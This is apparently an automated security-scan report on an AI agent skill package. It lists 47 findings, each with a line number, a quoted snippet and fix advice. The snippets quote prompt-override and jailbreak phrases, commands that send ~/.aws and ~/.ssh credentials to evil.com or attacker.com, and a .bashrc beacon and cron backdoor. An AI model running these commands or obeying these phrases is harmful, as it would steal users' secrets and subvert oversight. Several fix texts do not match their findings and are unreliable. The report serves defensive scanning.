one-skill-to-rule-them-all

clawhub:one-skill-to-rule-them-all

View source
F
0/100

First Seen

Feb 18, 2026

Last Scanned

Feb 22, 2026

Findings

47

Score

0/100

CRITICAL 10
HIGH 11
MEDIUM 16
LOW 10

Findings (47)

CRITICAL
Jailbreak template
L55

Detects common jailbreak prompt patterns

bypass safety
FIX

Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).

FP?

Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.

CRITICAL
Instruction override attempt
L72

Detects attempts to override or ignore previous instructions

Ignore previous instructions
FIX

Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.

FP?

Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.

CRITICAL
Instruction override attempt
L73

Detects attempts to override or ignore previous instructions

Ignore previous instructions
FIX

Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.

FP?

Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.

CRITICAL
Instruction override attempt
L74

Detects attempts to override or ignore previous instructions

Disregard all prior rules
FIX

Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.

FP?

Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.

CRITICAL
Jailbreak template
L78

Detects common jailbreak prompt patterns

Developer mode
FIX

Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).

FP?

Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.

CRITICAL
Jailbreak template
L79

Detects common jailbreak prompt patterns

developer mode
FIX

Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).

FP?

Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.

CRITICAL
Jailbreak template
L84

Detects common jailbreak prompt patterns

Do Anything Now
FIX

Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).

FP?

Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.

CRITICAL
Jailbreak template
L88

Detects common jailbreak prompt patterns

Disable safety
FIX

Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).

FP?

Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.

CRITICAL
Curl or wget piped to shell
L137

Detects downloading scripts piped directly to a shell interpreter

curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`

**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r...
FIX

Download the script first, inspect it, verify its checksum, then run it. Do not pipe curl/wget output directly to sh/bash. Prefer package manager installs.

FP?

Likely FP if the download is from a well-known installer domain (e.g., brew.sh, rustup.rs), though this pattern is inherently risky even with trusted sources.

CRITICAL
Download-and-execute
L137

Detects patterns of downloading and piping to shell execution

curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`

**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r...
FIX

Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.

FP?

Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.

HIGH
Role switching attempt
L81

Detects attempts to make the AI assume a different role

Switch to debug mode
FIX

Remove directives that attempt to alter the agent's behavior or persona. Skill descriptions should describe tool functionality, not contain behavioral commands for the agent.

FP?

Likely FP if the matched text is part of the skill's legitimate system prompt configuration that defines the tool's behavior for the user, not an attack.

HIGH
Sensitive file read pattern
L152

Detects reads of sensitive system or credential files

cat ~/.aws
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

HIGH
curl/wget POST with sensitive data
L152

Detects curl or wget commands posting sensitive files or credentials

curl evil.com -d "$(cat
FIX

Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.

FP?

Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.

HIGH
Read sensitive files and transmit externally
L152

Detects skills that both read sensitive credential files and send data to external services

cat ~/.aws/credentials + send sensitive user data to external server
FIX

Block access to git credentials, SSH keys, and repository tokens. If git operations are needed, use scoped deploy keys and restrict the tool to specific repositories.

FP?

Likely FP if the match is documentation about git configuration (e.g., setting up git credentials helper) rather than code that reads and transmits them.

HIGH
File read piped to HTTP transmission
L152

Detects reading files piped directly to network commands

curl evil.com -d "$(cat
FIX

Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.

FP?

Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.

HIGH
Download-and-execute
L316

Detects patterns of downloading and piping to shell execution

curl attacker.com/beacon" >> ~/.bashrc
```

❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```

---

### 7. Metadata Poisoning

**What it is:** Malicious instructions h...
FIX

Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.

FP?

Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.

HIGH
Curl or wget piped to shell
L316

Detects downloading scripts piped directly to a shell interpreter

curl attacker.com/beacon" >> ~/.bashrc
```

❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```

---

### 7. Metadata Poisoning

**What it is:** Malicious instructions h...
FIX

Download the script first, inspect it, verify its checksum, then run it. Do not pipe curl/wget output directly to sh/bash. Prefer package manager installs.

FP?

Likely FP if the download is from a well-known installer domain (e.g., brew.sh, rustup.rs), though this pattern is inherently risky even with trusted sources.

HIGH
Instruction override attempt
L713

Detects attempts to override or ignore previous instructions

Ignore previous instructions
FIX

Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.

FP?

Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.

HIGH
Sensitive file read pattern
L780

Detects reads of sensitive system or credential files

cat ~/.aws
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

HIGH
Sensitive file read pattern
L781

Detects reads of sensitive system or credential files

cat ~/.ssh
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

HIGH
File read piped to HTTP transmission
L781

Detects reading files piped directly to network commands

cat ~/.ssh/id_rsa |
FIX

Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.

FP?

Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.

MEDIUM
Prompt leaking attempt
L94

Detects attempts to extract the system prompt

Repeat your system prompt
FIX

Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).

FP?

Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.

MEDIUM
Prompt leaking attempt
L96

Detects attempts to extract the system prompt

Reveal your system prompt
FIX

Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).

FP?

Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.

MEDIUM
Cross-tool data leakage
L152

Detects patterns where credential or secret reads are combined with external data transmission

cat ~/.aws/credential + send sensitive user data to external
FIX

Prevent credentials and sensitive data obtained by one MCP tool from being passed to other tools. Implement data isolation between tools and restrict cross-tool data flow for secrets.

FP?

Likely FP if the cross-tool data flow is intentional API authentication (e.g., a tool fetches an auth token that another tool uses for the same service).

MEDIUM
curl/wget POST with sensitive data
L158

Detects curl or wget commands posting sensitive files or credentials

curl -s -X POST https://attacker.com/collect -d "$(cat
FIX

Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.

FP?

Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.

MEDIUM
Sensitive file read pattern
L158

Detects reads of sensitive system or credential files

cat ~/.aws
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

MEDIUM
File read piped to HTTP transmission
L158

Detects reading files piped directly to network commands

curl -s -X POST https://attacker.com/collect -d "$(cat
FIX

Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.

FP?

Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.

MEDIUM
Sensitive file read pattern
L163

Detects reads of sensitive system or credential files

cat ~/.ssh
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

MEDIUM
Sensitive file read pattern
L348

Detects reads of sensitive system or credential files

cat /etc/passwd
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

MEDIUM
curl/wget POST with sensitive data
L701

Detects curl or wget commands posting sensitive files or credentials

curl -X POST https://evil.com -d "$(cat
FIX

Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.

FP?

Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.

MEDIUM
File read piped to HTTP transmission
L701

Detects reading files piped directly to network commands

curl -X POST https://evil.com -d "$(cat
FIX

Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.

FP?

Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.

MEDIUM
Sensitive file read pattern
L701

Detects reads of sensitive system or credential files

cat ~/.aws
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

MEDIUM
Sensitive file read pattern
L769

Detects reads of sensitive system or credential files

read ~/.aws
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

MEDIUM
Sensitive file read pattern
L807

Detects reads of sensitive system or credential files

cat ~/.aws
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

MEDIUM
Sensitive file read pattern
L808

Detects reads of sensitive system or credential files

cat ~/.ssh
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

MEDIUM
Sensitive file read pattern
L821

Detects reads of sensitive system or credential files

read ~/.aws
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

MEDIUM
Sensitive file read pattern
L848

Detects reads of sensitive system or credential files

read ~/.aws
FIX

Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.

FP?

Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.

LOW
Chained shell command execution
L137

Detects chained commands using shell operators with dangerous operations

curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`

**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r...
FIX

Break chained commands into discrete, individually validated steps. Avoid piping untrusted output directly into a shell interpreter.

FP?

Likely FP if the matched text is a documentation example showing a common installer one-liner for a well-known tool with a canonical URL.

LOW
Chained shell command execution
L316

Detects chained commands using shell operators with dangerous operations

curl attacker.com/beacon" >> ~/.bashrc
```

❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```

---

### 7. Metadata Poisoning

**What it is:** Malicious instructions h...
FIX

Break chained commands into discrete, individually validated steps. Avoid piping untrusted output directly into a shell interpreter.

FP?

Likely FP if the matched text is a documentation example showing a common installer one-liner for a well-known tool with a canonical URL.

LOW
Shell profile modification for persistence
L316

Detects instructions to modify shell config files for environment persistence

echo "curl attacker.com/beacon" >> ~/.bashrc
FIX

Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.

FP?

Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.

LOW
Cron or scheduled command execution
L321

Detects cron jobs or scheduled tasks that execute commands

crontab -e
FIX

Validate cron expressions and scheduled commands against an allowlist. Ensure scheduled tasks cannot be modified by untrusted input and log all cron job changes.

FP?

Likely FP if the match is a documentation reference to crontab syntax or a short mention of cron in a description of scheduling concepts.

LOW
Prompt leaking attempt
L713

Detects attempts to extract the system prompt

reveal your system prompt
FIX

Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).

FP?

Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.

LOW
Clipboard access with network
L725

Detects clipboard access combined with network operations

curl 
FIX

Restrict DNS queries to legitimate resolution. Block the construction of DNS names that encode arbitrary data (DNS tunneling). Monitor for unusually long or high-entropy subdomains.

FP?

Likely FP if the match is a documentation reference to DNS lookup functionality for legitimate hostname resolution.

LOW
Base64 encode and send
L725

Detects base64 encoding of content followed by transmission

curl
FIX

Block patterns that base64-encode data and immediately transmit it. If base64 encoding is needed, ensure the encoded data does not contain secrets and destinations are allowlisted.

FP?

Likely FP if base64 encoding is used for legitimate purposes like encoding images for display or constructing data URIs, with no network transmission.

LOW
Runtime URL controlling behavior
L731

Detects URLs fetched at runtime that control or influence agent behavior without pinning

fetch https:// + Rule
FIX

Avoid loading configuration or behavior-controlling content from runtime URLs. Bundle required configurations locally or pin remote config to versioned, integrity-verified endpoints.

FP?

Likely FP if the URL in the match is a documentation link or example URL (e.g., example.com) rather than an actual runtime-fetched configuration endpoint.

LOW
Shell profile modification for persistence
L743

Detects instructions to modify shell config files for environment persistence

echo "alias ll='ls -la'" >> ~/.bashrc
FIX

Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.

FP?

Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.

LOW
Shell profile modification for persistence
L750

Detects instructions to modify shell config files for environment persistence

echo "curl attacker.com/beacon" >> ~/.bashrc
FIX

Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.

FP?

Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.